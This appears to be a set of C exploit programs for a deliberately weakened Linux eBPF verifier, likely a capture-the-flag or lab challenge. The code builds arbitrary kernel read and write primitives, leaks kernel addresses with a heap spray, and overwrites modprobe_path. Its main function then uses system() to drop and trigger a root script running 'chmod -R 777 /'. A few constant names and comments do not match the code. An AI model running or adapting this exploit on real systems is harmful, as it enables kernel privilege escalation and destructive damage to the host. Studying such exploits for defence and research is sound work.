      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  /* Payload: marker, target address, value to write. */
  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
/*
 * Arbitrary 64-bit kernel read: returns *(uint64_t *)addr.
 *
 * As in aaw64(), the verifier believes the skb_load_bytes() length is
 * 1 while it is 0x10 at runtime, so the call overflows fp-0x20 and
 * replaces the map-element pointer saved at fp-0x18 with @addr; the
 * following map_update_elem() then copies 8 bytes from @addr into the
 * map element, which userspace reads back with bpf_map_lookup().
 */
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  /* Payload: marker, address to read from. */
  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

// Full chain: leak a struct bpf_map address, derive the kernel base from its
// ->ops pointer, overwrite modprobe_path with our script, then trigger
// modprobe by executing a file with an unknown binary format.
int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  // The first qword of struct bpf_map is ->ops, a static kernel object, so
  // subtracting its known offset yields the randomized kernel base.
  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  const char* new_modprobe = "/tmp/evil.sh";
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf("[*] Overwrite modprobe to %s\n", new_modprobe);
  // Copy the path into a zero-padded scratch buffer first: the previous loop
  // read 8-byte chunks straight out of the string literal, running past its
  // terminator (out-of-bounds read), and never guaranteed the NUL byte itself
  // was written into the kernel.
  uint64_t payload[0x100 / 8] = {0};
  memcpy(payload, new_modprobe, new_modprobe_len + 1);
  for (size_t i = 0; i * 8 < new_modprobe_len + 1; i++) {
    aaw64(kernel_base + MODPROB_OFFSET + i * 8, payload[i]);
  }
  {
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    if (fd < 0) {
      fatal("open(/proc/sys/kernel/modprobe)");
    }

    char modprobe[0x100];
    ssize_t n = read(fd, modprobe, sizeof(modprobe) - 1);
    close(fd);
    if (n < 0) {
      n = 0;
    }
    modprobe[n] = '\0';  // read() does not NUL-terminate for us
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf("[*] new modprobe: %s\n", modprobe);
      puts("[-] Failed to overwrite modprobe");
      return -1;
    }
    puts("[+] Successfully overwritten modprobe");
  }

  puts("[+] Get root");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
  system("chmod +x /tmp/evil.sh");
  system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
  system("chmod +x /tmp/pwn");
  system("/tmp/pwn");

  return 0;
}

Leaks

Leak addr of struct bpf_map using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handle the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

/* Show a prompt and block until the user sends a character on stdin. */
void get_enter_to_continue(const char* msg) {
  fputs(msg, stdout);
  fputc('\n', stdout);
  (void)getchar();
}

/* Report the failing call via errno and terminate the exploit. */
void fatal(const char* msg) {
  perror(msg);
  exit(-1);  /* exit status 255, matching the original convention */
}

/* Thin wrapper around the bpf(2) syscall; returns the raw syscall result. */
int bpf(int cmd, union bpf_attr* attrs) {
  long ret = syscall(__NR_bpf, cmd, attrs, sizeof(union bpf_attr));
  return (int)ret;
}

/* Create a single BPF array map with int keys; aborts on failure. */
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_type = BPF_MAP_TYPE_ARRAY;
  attr.key_size = sizeof(int);
  attr.value_size = val_size;
  attr.max_entries = max_entries;

  int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }
  return fd;
}
/* Store *pval at map[key]; aborts on failure, returns bpf(2)'s result. */
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;

  int rc = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (rc < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }
  return rc;
}
/* Read map[key] into *pval; returns bpf(2)'s raw result (negative on error). */
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;
  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// fd of the BPF array map used as scratch storage by the leak primitive.
int mapfd = -1;
// Leak the kernel address of our struct bpf_map.
// Loads a socket filter that abuses the patched verifier (see the diff above):
// OR-ing a register whose upper 32 bits are unknown with 0xfffffffe00000001
// leaves the verifier believing the value is fully known while the runtime
// value differs, so the bounded-looking pointer arithmetic on the map element
// pointer passes verification. The program stores the mangled element pointer
// back into the map; after triggering the filter with one packet, userspace
// reads it out and rebases it (elem ptr - 1 - 0x110) to the struct bpf_map.
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Any packet triggers the attached filter once.
  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

// Kernel address of the struct bpf_map, filled in by leak_bpf_map_addr().
uint64_t bpf_map_addr = 0;

// Demo driver: leak and print the kernel address of the struct bpf_map.
// (Dropped the unused 64 KiB `verifier_log` stack buffer the original
// declared but never read or wrote.)
int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}

Leak addr of struct bpf_map using oob read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handle the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

/* Show a prompt and block until the user sends a character on stdin. */
void get_enter_to_continue(const char* msg) {
  fputs(msg, stdout);
  fputc('\n', stdout);
  (void)getchar();
}

/* Report the failing call via errno and terminate the exploit. */
void fatal(const char* msg) {
  perror(msg);
  exit(-1);  /* exit status 255, matching the original convention */
}

/* Thin wrapper around the bpf(2) syscall; returns the raw syscall result. */
int bpf(int cmd, union bpf_attr* attrs) {
  long ret = syscall(__NR_bpf, cmd, attrs, sizeof(union bpf_attr));
  return (int)ret;
}

/* Create a single BPF array map with int keys; aborts on failure. */
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_type = BPF_MAP_TYPE_ARRAY;
  attr.key_size = sizeof(int);
  attr.value_size = val_size;
  attr.max_entries = max_entries;

  int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }
  return fd;
}
/* Store *pval at map[key]; aborts on failure, returns bpf(2)'s result. */
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;

  int rc = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (rc < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }
  return rc;
}
/* Read map[key] into *pval; returns bpf(2)'s raw result (negative on error). */
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;
  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// fd of the map whose first element is used as scratch storage (map_spray_fd[0x81]).
int mapfd;
// fds of the sprayed maps; one neighbour's ->ops pointer gets its low byte corrupted.
int map_spray_fd[0x100];
// Spray 0x100 single-entry array maps, then load a socket filter that uses
// the patched verifier (see the diff above) to hide the true length passed to
// skb_load_bytes: the verifier tracks arg4 as 0x1 while it is 0xf1 at run
// time. The packet written at the end therefore overflows the 8-byte map
// element of map_spray_fd[0x81] and writes 0xa0 - 8 over the low byte of an
// adjacent sprayed bpf_map's ->ops pointer.
// NOTE(review): which neighbour gets hit depends on heap layout —
// find_corrupted_map_and_leak_bpf_map_addr() probes for it afterwards.
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

